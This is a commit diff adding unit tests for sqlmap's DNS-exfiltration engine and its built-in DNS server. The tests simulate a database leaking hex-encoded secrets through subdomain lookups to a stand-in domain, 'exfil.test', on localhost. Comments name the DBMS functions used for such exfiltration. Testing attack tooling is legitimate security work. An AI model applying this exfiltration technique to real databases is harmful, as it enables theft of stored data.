Adding some more pyunittests

This commit is contained in:
Miroslav Štampar 2026-06-21 22:38:22 +02:00
parent e82b1b56f7
commit 7e652ed15d
4 changed files with 567 additions and 2 deletions

View file

@ -189,7 +189,7 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch
48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
65603f9bbf42cd67a1cf9b3f6277b3af3fdf6b3678fcaa2fe21fe09961f9316c lib/core/settings.py
de4f4a95b30c703518a68d96a904bcf908033be8a0d9a03000a2da163f139303 lib/core/settings.py
cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py
bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py
70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6 lib/core/target.py
@ -587,6 +587,8 @@ a48c411fea864e6bcd6a1c7e1a35094b8cda8d15088fd9e7b0270542ae20daa9 tests/test_com
9c0a0cd0b2d52a53f75c98c60f87a022354b7c3dc4baaf3fe1e272a0af5b7f0a tests/test_dialectdbms.py
e40a49cfa73c45b3c3c6d1d1d00738861e270cb7a07b28f5a5356f9c7c800cf2 tests/test_dialect.py
993a2d4d87c4fbaf261663b069629acc95ee4405aa0c42cf5a8f39649fdb0fff tests/test_dicts.py
a38f3257aa218fa706ddb903c181715b2286619c46aea0097b7d365d18c410c5 tests/test_dns_engine.py
703faac01f38224ba85bd0fc398d939ea034f1d7fd641cdc15da4f77ec049443 tests/test_dns_server.py
9cd5841349bc4db818658d12184929a96f7f279eff1f53ad18a54dbefbd6b276 tests/test_dump_jsonl.py
2bbe4b01f79992cfa8884651fc0a28dbd0e3abb0cbea9eb7eadf1f98ca3c3420 tests/test_encoding.py
bb6991260a994fcbe79e05febaa34affd5631d02299fbc626820addd5f6ea4f4 tests/test_error_engine.py

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.135"
VERSION = "1.10.6.136"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

272
tests/test_dns_engine.py Normal file
View file

@ -0,0 +1,272 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
The DNS-exfiltration extraction engine (lib/techniques/dns/use.py dnsUse) and the
channel-detection probe (lib/techniques/dns/test.py dnsTest).
DNS exfil is normally driven by a back-end DBMS that performs an actual DNS lookup
of an attacker-controlled hostname (Oracle UTL_INADDR, MSSQL xp_dirtree, ...),
encoding the queried data in the subdomain labels which then reach sqlmap's
in-process DNS server. That DBMS behaviour cannot be reproduced locally without a
real DNS-emitting engine, so here we drive the REAL dnsUse()/dnsTest() logic + the
REAL DNSServer (on a high port, no root) and emulate ONLY that one step: a mock
Request.queryPage plays the DBMS - it takes the per-iteration boundaries dnsUse
generated and fires a genuine UDP DNS query for
'prefix.<hex chunk of the secret>.suffix.domain' at the DNS server.
So the chunking/offset/reassembly loop, the dns_request snippet rendering, the
DNSServer packet parse, pop(prefix,suffix), regex extraction, hex decoding and the
detection-then-disable logic are all exercised for real; if any of them regress
these go red - without a live DBMS.
NOTE on fidelity: secrets are kept ASCII so the mock's byte-slice chunking matches a
DBMS character-substring exactly. Multi-byte (UTF-8) values, where DBMS SUBSTRING is
character-based and a chunk could split a code point, need the real-DBMS run.
"""
import binascii
import os
import socket
import struct
import sys
import threading
import time
import unittest
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from _testutils import bootstrap, set_dbms
bootstrap()
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.data import conf, kb
from lib.core.enums import DBMS
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
from lib.core.settings import MAX_DNS_LABEL
from lib.request.connect import Connect
from lib.request.dns import DNSServer
import lib.techniques.dns.use as dnsmod
import lib.techniques.dns.test as dnstestmod
DNS_PORT = 5355
def _build_query(name, tid=b"\x12\x34"):
pkt = tid + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\x00\x00"
for label in name.split("."):
if label:
pkt += struct.pack("B", len(label)) + label.encode()
return pkt + b"\x00" + b"\x00\x01" + b"\x00\x01"
class _HighPortDNSServer(DNSServer):
# same logic as the real server (parse/pop/run), just bound high so no root is needed
def __init__(self, port):
self._requests = []
self._lock = threading.Lock()
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(("127.0.0.1", port))
self._running = False
self._initialized = False
_CONF = {"dnsDomain": "exfil.test", "hexConvert": False, "api": False, "verbose": 0, "forceDns": False}
_KB = {"dnsTest": True, "dnsMode": False, "bruteMode": False, "safeCharEncode": False}
class _DnsCase(unittest.TestCase):
DBMS_NAME = "MySQL"
@classmethod
def setUpClass(cls):
cls.server = _HighPortDNSServer(DNS_PORT)
cls.server.run()
while not cls.server._initialized:
time.sleep(0.02)
def setUp(self):
self._saved_conf = {k: conf.get(k) for k in _CONF}
self._saved_kb = {k: kb.get(k) for k in _KB}
self._saved_qp = Connect.queryPage
self._saved_randomStr = dnsmod.randomStr
self._saved_randomInt = dnstestmod.randomInt
self._saved_dnsServer = conf.get("dnsServer")
self._saved_hdbR, self._saved_hdbW = dnsmod.hashDBRetrieve, dnsmod.hashDBWrite
for k, v in _CONF.items():
conf[k] = v
for k, v in _KB.items():
kb[k] = v
conf.dnsServer = self.server
# isolate from the session hash DB (avoid cross-test value caching / uninitialized store)
dnsmod.hashDBRetrieve = lambda *a, **k: None
dnsmod.hashDBWrite = lambda *a, **k: None
# MSSQL/PostgreSQL build the payload via the stacked-query injection plumbing
# (agent.prefixQuery/agent.payload, needing a full kb.injection). That plumbing is
# generic - not DNS logic - and the mock oracle ignores the payload, so stub it to a
# pass-through; the DNS-specific snippet/substring/chunking still runs for real.
self._saved_prefixQuery, self._saved_payload = agent.prefixQuery, agent.payload
agent.prefixQuery = lambda expression, *a, **k: expression
agent.payload = lambda place=None, parameter=None, value=None, newValue=None, where=None: newValue or ""
set_dbms(self.DBMS_NAME)
def tearDown(self):
for k, v in self._saved_conf.items():
conf[k] = v
for k, v in self._saved_kb.items():
kb[k] = v
conf.dnsServer = self._saved_dnsServer
Connect.queryPage = self._saved_qp
dnsmod.Request.queryPage = self._saved_qp
dnsmod.randomStr = self._saved_randomStr
dnstestmod.randomInt = self._saved_randomInt
dnsmod.hashDBRetrieve, dnsmod.hashDBWrite = self._saved_hdbR, self._saved_hdbW
agent.prefixQuery, agent.payload = self._saved_prefixQuery, self._saved_payload
def _install_oracle(self, secret, working=True, force=None):
"""
Installs a mock queryPage that plays the DBMS: for each dnsUse iteration it fires a
real UDP DNS query carrying the next hex chunk of L{secret}. working=False models a
dead DNS channel (the DBMS never emits a lookup). force=(prefix, suffix) pins the
random boundary labels (to construct adversarial cases like a domain/suffix collision).
"""
secret_bytes = secret.encode("utf-8")
boundaries = []
served = [0]
real_randomStr = self._saved_randomStr
def spy_randomStr(length=4, alphabet=None, **kw):
if alphabet == DNS_BOUNDARIES_ALPHABET and length == 3:
out = force[len(boundaries) % 2] if force else real_randomStr(length=length, alphabet=alphabet, **kw)
boundaries.append(out)
return out
return real_randomStr(length=length, alphabet=alphabet, **kw) if alphabet is not None else real_randomStr(length=length, **kw)
dnsmod.randomStr = spy_randomStr
dbms = Backend.getIdentifiedDbms()
chunk_length = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2
def oracle(payload=None, *args, **kwargs):
if not working:
return None
prefix, suffix = boundaries[-2], boundaries[-1]
chunk = secret_bytes[served[0]:served[0] + chunk_length]
if chunk:
host = "%s.%s.%s.%s" % (prefix, binascii.hexlify(chunk).decode(), suffix, conf.dnsDomain)
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
c.settimeout(3)
c.sendto(_build_query(host), ("127.0.0.1", DNS_PORT))
try:
c.recvfrom(512)
finally:
c.close()
served[0] += len(chunk)
for _ in range(100):
with self.server._lock:
if any(host.encode() in r for r in self.server._requests):
break
time.sleep(0.01)
return None
Connect.queryPage = staticmethod(oracle)
dnsmod.Request.queryPage = staticmethod(oracle)
def _extract(self, secret):
self._install_oracle(secret)
return dnsmod.dnsUse("%s AND %d=%d", "user()")
class TestDnsExfilEngine(_DnsCase):
DBMS_NAME = "MySQL"
def test_short_value(self):
self.assertEqual(self._extract("luther"), "luther")
def test_value_spanning_multiple_dns_labels(self):
# > one DNS label -> forces the chunking/offset/reassembly loop (multiple queries)
secret = "The quick brown fox jumps over the lazy dog 0123456789 abcdef"
self.assertEqual(self._extract(secret), secret)
def test_exact_chunk_boundary(self):
# length exactly one chunk: last-chunk break condition (len < chunk_length) edge
dbms = Backend.getIdentifiedDbms()
cl = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2
secret = "A" * cl
self.assertEqual(self._extract(secret), secret)
def test_special_characters(self):
secret = "p@ss W0rd!#%&"
self.assertEqual(self._extract(secret), secret)
def test_domain_label_colliding_with_suffix(self):
# adversarial: --dns-domain's leading label equals the random suffix. A greedy
# extraction regex would run past the real boundary into the domain and corrupt the
# value; the (lazy) extraction must still recover it exactly.
conf.dnsDomain = "hhh.exfil.test" # leading label 'hhh' == forced suffix
self._install_oracle("luther", force=("ggg", "hhh"))
self.assertEqual(dnsmod.dnsUse("%s AND %d=%d", "user()"), "luther")
class TestDnsExfilEngineOracle(TestDnsExfilEngine):
# Oracle: different dns_request snippet (UTL_INADDR.GET_HOST_ADDRESS, '||' concat) and
# SUBSTRC substring template - re-runs the whole battery through the Oracle dialect.
DBMS_NAME = "Oracle"
class TestDnsExfilEnginePostgres(TestDnsExfilEngine):
# PostgreSQL: stacked-query branch (agent.payload), plpgsql COPY dns_request snippet,
# 'SUBSTRING((...)::text FROM x FOR y)' substring template.
DBMS_NAME = "PostgreSQL"
class TestDnsExfilEngineMssql(TestDnsExfilEngine):
# MSSQL: stacked-query branch, xp_dirtree dns_request snippet, and crucially a SMALLER
# chunk_length (MAX_DNS_LABEL//4 - 2) - exercises the alternate chunking arithmetic.
DBMS_NAME = "Microsoft SQL Server"
class TestDnsLabelInvariant(unittest.TestCase):
"""The exfil chunk is hex-encoded into ONE DNS label, so 2*chunk_length must never exceed the
63-octet DNS label limit - otherwise the query carries an invalid (over-long) label and exfil
silently breaks. Guards the chunk_length arithmetic in dnsUse for every supported DBMS."""
def test_hex_label_within_max_dns_label(self):
for dbms in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL):
chunk_length = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2
self.assertGreater(chunk_length, 0, "%s: non-positive chunk_length" % dbms)
self.assertLessEqual(2 * chunk_length, MAX_DNS_LABEL,
"%s: hex label (%d) exceeds MAX_DNS_LABEL (%d)" % (dbms, 2 * chunk_length, MAX_DNS_LABEL))
class TestDnsChannelDetection(_DnsCase):
"""dnsTest(): probes the channel with a known random integer and disables DNS exfil if
the value doesn't come back (unless --force-dns, which then aborts)."""
DBMS_NAME = "MySQL"
KNOWN = 4815162342
def _patch_known_int(self):
dnstestmod.randomInt = lambda *a, **k: self.KNOWN
def test_detection_success_keeps_channel(self):
self._patch_known_int()
self._install_oracle(str(self.KNOWN), working=True)
dnstestmod.dnsTest("%s AND %d=%d")
self.assertTrue(kb.dnsTest)
self.assertEqual(conf.dnsDomain, "exfil.test") # channel kept
def test_detection_failure_disables_channel(self):
self._patch_known_int()
self._install_oracle(str(self.KNOWN), working=False) # dead channel
dnstestmod.dnsTest("%s AND %d=%d")
self.assertFalse(kb.dnsTest)
self.assertIsNone(conf.dnsDomain) # exfil turned off
def test_detection_failure_with_force_dns_raises(self):
self._patch_known_int()
conf.forceDns = True
self._install_oracle(str(self.KNOWN), working=False)
self.assertRaises(SqlmapNotVulnerableException, dnstestmod.dnsTest, "%s AND %d=%d")
if __name__ == "__main__":
unittest.main(verbosity=2)

291
tests/test_dns_server.py Normal file
View file

@ -0,0 +1,291 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
The DNS server used for DNS-exfiltration (lib/request/dns.py): raw packet parsing
(DNSQuery), fake A-record response crafting, the pop(prefix, suffix) accounting, and
- importantly - resilience: a single malformed packet or a transient send error must
NOT kill the server thread (which would silently lose all further exfiltration).
"""
import collections
import os
import socket
import struct
import sys
import threading
import time
import unittest
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
from lib.core.settings import MAX_DNS_REQUESTS
from lib.request.dns import DNSQuery, DNSServer
def build_query(name, tid=b"\x12\x34", qtype=1):
"""Minimal standard (opcode 0) DNS query packet for L{name} (qtype 1=A, 28=AAAA, ...)"""
pkt = tid + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\x00\x00"
for label in name.split("."):
if label:
pkt += struct.pack("B", len(label)) + label.encode()
return pkt + b"\x00" + struct.pack(">H", qtype) + b"\x00\x01"
class _HighPortDNSServer(DNSServer):
"""Real DNSServer logic, bound on a high port (no root, no :53 probe)"""
def __init__(self, port, sock=None, maxlen=MAX_DNS_REQUESTS):
self._requests = collections.deque(maxlen=maxlen)
self._lock = threading.Lock()
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("127.0.0.1", port))
self._socket = sock
self._running = False
self._initialized = False
class _SendFailOnceSocket(object):
"""Wraps a real UDP socket; first sendto() raises (simulated transient failure)"""
def __init__(self, real):
self._real = real
self._sends = 0
def recvfrom(self, *a, **k):
return self._real.recvfrom(*a, **k)
def sendto(self, *a, **k):
self._sends += 1
if self._sends == 1:
raise RuntimeError("simulated transient sendto failure")
return self._real.sendto(*a, **k)
def __getattr__(self, name):
return getattr(self._real, name)
class TestDNSQuery(unittest.TestCase):
def test_parses_data_bearing_name(self):
q = DNSQuery(build_query("pre.deadbeef.suf.exfil.test"))
self.assertEqual(q._query, b"pre.deadbeef.suf.exfil.test.")
def test_empty_and_short_packets_do_not_raise(self):
for raw in (b"", b"\x00", b"\x12", b"\x12\x34", b"\x12\x34\x01\x20"):
self.assertEqual(DNSQuery(raw)._query, b"") # no exception, empty query
def test_unterminated_name_does_not_raise(self):
# a length byte that runs past the buffer, with no null terminator
pkt = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" + b"\x20" + b"abc"
DNSQuery(pkt) # must not raise (slicing past end yields b"", ord guards)
def test_response_is_valid_A_record(self):
q = DNSQuery(build_query("x.y.z", tid=b"\xab\xcd"))
resp = q.response("127.0.0.1")
self.assertEqual(resp[:2], b"\xab\xcd") # transaction id echoed
self.assertEqual(resp[2:4], b"\x85\x80") # standard response, no error
ip = ".".join(str(b if isinstance(b, int) else ord(b)) for b in resp[-4:])
self.assertEqual(ip, "127.0.0.1")
def test_empty_query_yields_empty_response(self):
self.assertEqual(DNSQuery(b"\x00").response("127.0.0.1"), b"")
class TestDNSServerRoundTrip(unittest.TestCase):
PORT = 5471
@classmethod
def setUpClass(cls):
cls.srv = _HighPortDNSServer(cls.PORT)
cls.srv.run()
while not cls.srv._initialized:
time.sleep(0.02)
def _send(self, name):
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
c.settimeout(3)
c.sendto(build_query(name), ("127.0.0.1", self.PORT))
try:
c.recvfrom(512)
except socket.timeout:
pass
finally:
c.close()
for _ in range(100):
with self.srv._lock:
if any(name.encode() in r for r in self.srv._requests):
return True
time.sleep(0.01)
return False
def test_roundtrip_and_pop(self):
self.assertTrue(self._send("aaa.cafe.bbb.exfil.test"))
self.assertIsNone(self.srv.pop("zzz", "yyy")) # wrong boundaries
self.assertIsNotNone(self.srv.pop("aaa", "bbb")) # correct boundaries
self.assertIsNone(self.srv.pop("aaa", "bbb")) # consumed only once
def test_non_a_query_type_still_recorded(self):
# a DBMS resolver may emit AAAA (28) / TXT (16) lookups - the exfiltrated name is in the
# labels regardless of qtype, and the server records before crafting the (A) response
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
c.settimeout(2)
c.sendto(build_query("ggg.beef.hhh.exfil.test", qtype=28), ("127.0.0.1", self.PORT))
try:
c.recvfrom(512)
except socket.timeout:
pass
finally:
c.close()
for _ in range(200):
if self.srv.pop("ggg", "hhh"):
return
time.sleep(0.01)
self.fail("AAAA-type query was not recorded (exfil would be lost for AAAA-resolving DBMSes)")
class TestDNSServerMemoryBound(unittest.TestCase):
"""The server records every received query (it listens on :53); only matching ones are
popped. Unrelated/stray traffic and resolver retries must not grow memory without bound."""
PORT = 5475
def test_requests_are_bounded_and_recent_kept(self):
srv = _HighPortDNSServer(self.PORT, maxlen=50)
srv.run()
while not srv._initialized:
time.sleep(0.02)
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for i in range(200): # flood well past the bound
c.sendto(build_query("noise%d.unrelated.test" % i), ("127.0.0.1", self.PORT))
c.close()
# a legit exfil query right after the flood must still be capturable
c2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); c2.settimeout(2)
c2.sendto(build_query("ppp.d00d.qqq.exfil.test"), ("127.0.0.1", self.PORT))
try:
c2.recvfrom(512)
except socket.timeout:
pass
finally:
c2.close()
popped = None
for _ in range(200):
popped = srv.pop("ppp", "qqq")
if popped:
break
time.sleep(0.01)
with srv._lock:
n = len(srv._requests)
self.assertLessEqual(n, 50, "request buffer exceeded its bound (%d)" % n)
self.assertIsNotNone(popped, "a fresh exfil query was lost after a flood of stray traffic")
class TestDNSServerResilience(unittest.TestCase):
def _make(self, port, sock=None):
srv = _HighPortDNSServer(port, sock=sock)
srv.run()
while not srv._initialized:
time.sleep(0.02)
return srv
def _query(self, port, name):
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
c.settimeout(1)
c.sendto(build_query(name), ("127.0.0.1", port))
try:
c.recvfrom(512)
except socket.timeout:
pass
finally:
c.close()
def _recorded(self, srv, token, tries=120):
for _ in range(tries):
with srv._lock:
if any(token.encode() in r for r in srv._requests):
return True
time.sleep(0.01)
return False
def test_survives_transient_send_error(self):
port = 5472
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("127.0.0.1", port))
srv = self._make(port, sock=_SendFailOnceSocket(s))
self._query(port, "aaa.11.bbb.exfil.test") # first sendto raises
self._query(port, "ccc.22.ddd.exfil.test") # must still be served
self.assertTrue(self._recorded(srv, "ccc.22.ddd"),
"DNS server died after one failing sendto (lost subsequent exfil)")
self.assertTrue(srv._running)
def test_survives_malformed_packets(self):
port = 5473
srv = self._make(port)
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for junk in (b"", b"\x00", b"\xff" * 7, b"\x12\x34\x01\x00\x00\x01" + b"\x20abc"):
c.sendto(junk, ("127.0.0.1", port))
c.close()
self._query(port, "ok.33.fine.exfil.test")
self.assertTrue(self._recorded(srv, "ok.33.fine"),
"DNS server died on a malformed packet")
class TestDNSServerConcurrency(unittest.TestCase):
"""Under --threads, many workers fire DNS queries and call pop() while the server thread
appends - all guarded by one lock. Each worker must get back exactly its own data."""
PORT = 5474
@classmethod
def setUpClass(cls):
cls.srv = _HighPortDNSServer(cls.PORT)
cls.srv.run()
while not cls.srv._initialized:
time.sleep(0.02)
def test_concurrent_send_and_pop_no_crosstalk(self):
import binascii, re
N = 12
errors = []
def worker(i):
# distinct boundary labels per worker (DNS boundary alphabet = letters, no a-f/digits)
prefix = "gg" + chr(ord("g") + i)
suffix = "mm" + chr(ord("g") + i)
secret = ("worker-%02d-secret" % i).encode()
host = "%s.%s.%s.exfil.test" % (prefix, binascii.hexlify(secret).decode(), suffix)
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
c.settimeout(2)
try:
c.sendto(build_query(host), ("127.0.0.1", self.PORT))
try:
c.recvfrom(512)
except socket.timeout:
pass
finally:
c.close()
got = None
for _ in range(200):
got = self.srv.pop(prefix, suffix)
if got:
break
time.sleep(0.01)
if not got:
errors.append("worker %d: never popped its query" % i); return
m = re.search(r"%s\.(?P<r>.+?)\.%s" % (prefix, suffix), got, re.I)
if not m or binascii.unhexlify(m.group("r")) != secret:
errors.append("worker %d: cross-talk/corruption got=%r" % (i, got))
threads = [threading.Thread(target=worker, args=(i,)) for i in range(N)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(errors, [], "concurrency failures: %s" % errors)
# every queued request consumed exactly once -> nothing left behind
self.assertEqual(self.srv.pop("gg" + chr(ord("g")), "mm" + chr(ord("g"))), None)
if __name__ == "__main__":
unittest.main(verbosity=2)